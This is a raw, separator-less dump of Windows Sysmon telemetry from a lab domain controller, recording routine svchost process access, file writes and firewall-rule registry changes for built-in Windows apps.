12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.395{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.379{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|M=microsoft.windows.secondarytileexperience_cw5n1h2txyewy|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|D=C:\Windows\SystemApps\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\|PFN=Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy| 13241300x80000000000000005519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.379{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|M=microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\|PFN=Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy| 13241300x80000000000000005518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.379{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{7D1F5F64-44D7-4063-9E7D-CF8C553C73BA}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|EmbedCtxt=SecondaryTileExperience| 13241300x80000000000000005517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.379{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{87C8FB50-D8DC-410E-A0E6-13F157162BEB}v2.26|Action=Block|Active=TRUE|Dir=In|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|EmbedCtxt=SecondaryTileExperience| 13241300x80000000000000005516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.379{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{D61C88B2-0334-4906-AE00-7F3841B24151}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|EmbedCtxt=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}| 13241300x80000000000000005515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.379{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{AF30A5A7-EB7B-4B91-95C1-4E443CEEB598}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|EmbedCtxt=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}| 11241100x80000000000000005514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.364{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:18.364 11241100x80000000000000005513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.364{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:18.364 23542300x80000000000000005512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.364{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.364{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.364{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3927867B699E61E69E19EA3F0C2208F9,SHA256=62159A29B23847B92F28C44C26153A90A7C214F78A427AB537684ED433909922,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 